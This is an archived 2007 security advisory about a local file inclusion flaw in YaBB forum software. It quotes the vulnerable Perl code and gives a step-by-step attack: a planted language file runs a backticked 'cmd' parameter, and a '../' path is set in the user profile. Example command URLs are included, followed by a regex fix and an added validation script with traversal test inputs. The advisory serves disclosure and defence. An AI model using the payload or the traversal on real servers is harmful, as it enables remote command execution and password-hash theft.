yabb-lfi.txt
Posted Jun 20, 2007
Authored by krasza | Site krasza.int.pl

YaBB versions 2.1 and below suffer from a local file inclusion vulnerability that allows for remote code execution.

tags | exploit, remote, local, code execution, file inclusion
SHA-256 | af958fb5a94edadc7e8f93f91b70ddb2da76329318f1774e91870c90573fdf8e

Local File Include Vulnerabilities

Problem: Local File Include Vulnerabilities
Product: YaBB <= 2.1 (all versions)
Web page: http://www.yabbforum.com/

Credit: Maciej `krasza` Kukla
@mail: krasza@gmail.com
homepage: www.krasza.int.pl

1. Description

"YaBB is a leading free forum software package that rivals any professional message board out there. It provides a real-time chat and support system for your visitors. While chat programs allow people to talk directly, you have to be on at the same time as others. With forum software like YaBB, you can talk any time, and everyone can join in the conversation! Build a community and get visitors to come back for interesting discussions, fun chit chat, or needed support without having to spend thousands of dollars."

http://www.google.pl/search?q=Powered+by+YaBB => 1,640,000 clients

2. Local File Include

I found many bugs of this kind in this board. They all relate to one user-controlled variable ($language, which you can edit in your profile). Examples of where I found them:

---Sources/HelpCentre.pl:139---
if (-e ("$helpfile/$language/$help_area/$line.help")) {
require "$helpfile/$language/$help_area/$line.help";
}
---end---

---Sources/Subs.pl:1529---
if (-e "$langdir/$use_lang/$what_to_load.lng") {
require "$langdir/$use_lang/$what_to_load.lng";
}
---end---

---Sources/ICQPager.pl:21---
if ($language) { require "$langdir/$language/ICQ.lng"; }
---end---

---Sources/Post.pl:1838---
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }
---end---

---Sources/Post.pl:1863---
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }
---end---

---Sources/Post.pl:1880---
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }
---end---

---Sources/InstantMessage.pl:1080---
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/InstantMessage.lng"; }
---end---

---Sources/InstantMessage.pl:1082---
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/Main.lng"; }
---end---

You can set this variable in the profile module. By using "../" sequences, you can read other users' files (which contain the password hashes), execute other Perl scripts (and so execute your own code), etc.

Example 'plan of attack' against a page hosting a YaBB forum (executing your command on the server):

1. Find a site hosting a YaBB forum (example 'http://victim.com/~krasza/yabb2/')
2. Modify your local copy of the 'English' folder (from the YaBB package):
English/HelpCentre.lng
---
%helptxt = (
'1' => "Help Section",
'2' => "Contents",
---

change to:

---
$content="<br><br><br><br><font color=red>";
$content.=`$INFO{'cmd'}`;
$content.="</font><br><br><br><br>";
%helptxt = (
'1' => "Help Section",
'2' => $content,
---

3. Copy your modified local folder to your account on the target server (victim.com)
4. Create a new user (example 'attacker') on the target forum ('http://vicitm.com/~krasza/yabb2/')
5. Edit your profile and set 'userlanguage' to "../../path/your/folder/where/is/English's/folder/" (I suggest using the 'Tamper Data' plugin for Firefox);
6. Go to 'Help' on the YaBB page in your browser ('http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help');
7. Now, thanks to the 'cmd' variable, you can execute your command, for example:

http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&cmd=whoami returns 'nobody' (in red) at the top of the left frame.
http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&cmd=uname%20-a returns 'Linux thrall 2.4.31 #21 Sun Jun 5 19:19:51 PDT 2005 i686 unknown unknown GNU/Linux '
etc.


3. Exploits:

If you really want to see an exploit for this bug, I can publish my code. I prefer not to publish my exploits. I think the 'plan of attack' above should suffice.


4. Fix:

YaBB must filter the language variable in the profile module. Until the YaBB team publishes an official fix, you should edit Sources/Profile.pl as follows:

---Sources/Profile.pl:1225---
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@/]+\Z^ && $member{'userlanguage'} ne "") { &fatal_error($profile_txt{'815'}); }
---end---

change to:

---Sources/Profile.pl:1225---
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@]+\Z^ && $member{'userlanguage'} ne "") { &fatal_error($profile_txt{'815'}); }
---end---

This version rejects any value containing a slash '/', so "../" sequences can no longer be injected.
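As an added example (not YaBB's own code), the script below applies the patched character class from the fix above and then a stricter allowlist of language directories that actually exist under $langdir; the temporary $langdir and the sample inputs are constructed. It also shows that the character class alone still accepts '..', which the allowlist refuses.

```perl
#!/usr/bin/perl
# Added example, not YaBB's own code: the character-class check from the
# fix above, plus a stricter allowlist against the language directories
# that really exist under $langdir. All paths and inputs are constructed.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Same class as the patched Profile.pl line with '/' removed, so "../"
# cannot be formed. \z (rather than \Z) also refuses a trailing newline.
sub lang_chars_ok {
    my ($lang) = @_;
    return 1 if $lang eq '';
    return $lang =~ m{\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\,\@]+\z} ? 1 : 0;
}

# Stricter: accept only an exact match for an existing language directory
# (YaBB ships one named 'English'), ignoring dot entries such as '..'.
sub lang_installed {
    my ($langdir, $lang) = @_;
    return 0 unless $lang ne '' && lang_chars_ok($lang);
    opendir(my $dh, $langdir) or return 0;
    my %dirs = map  { $_ => 1 }
               grep { !/^\./ && -d File::Spec->catdir($langdir, $_) }
               readdir($dh);
    closedir($dh);
    return exists $dirs{$lang} ? 1 : 0;
}

# Constructed $langdir with a single installed language.
my $langdir = tempdir(CLEANUP => 1);
mkdir File::Spec->catdir($langdir, 'English') or die "mkdir: $!";

# First value is legitimate; the rest are traversal-style or malformed.
my @samples = ('English', 'Polish', '../../home/attacker/www', "English\n", '..');
for my $s (@samples) {
    (my $shown = "'$s'") =~ s/\n/\\n/g;
    printf "%-30s chars_ok=%d installed=%d\n",
        $shown, lang_chars_ok($s), lang_installed($langdir, $s);
}
```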



Maciej `krasza` Kukla
krasza@gmail.com
www.krasza.int.pl

http://www.krewniacy.pl

--
Best regards, Maciej `krasza` Kukla